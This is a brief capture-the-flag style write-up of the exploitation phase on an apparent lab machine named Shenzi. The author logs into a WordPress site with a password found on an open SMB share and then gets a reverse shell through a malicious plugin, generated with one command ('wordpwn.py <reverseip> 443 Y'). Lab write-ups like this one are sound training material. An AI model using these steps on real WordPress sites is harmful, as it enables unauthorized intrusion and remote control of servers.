Exploitation

After trying to find any vulnerable services, I tried to find some sort of wordpress, webdav, phpmyadmin to get a shell.

Unfortunately I was unable to find anything until i tried a directory with the name of the box. 😂

The directory /shenzi/ led me to a wordpress site which the only thing I had to do was type wp-login/php with the password that I got from the NULL SMB share.

All i needed to do was follow the steps from the Sandbox network from the OSCP labs and I would get a reverse shell.

We generate a reverse shell using this github repo.

GitHub - wetw0rk/malicious-wordpress-plugin: Simply generates a wordpress plugin that will grant you a reverse shell once uploaded. I recommend installing Kali Linux, as msfvenom is used to generate the payload.GitHub

python wordpwn.py <reverseip> 443 Y

All we have to do is upload the zip file and install it as a plugin and navigate to it and we will get a reverse shell.

Navigate to the file.

Andddd RCE.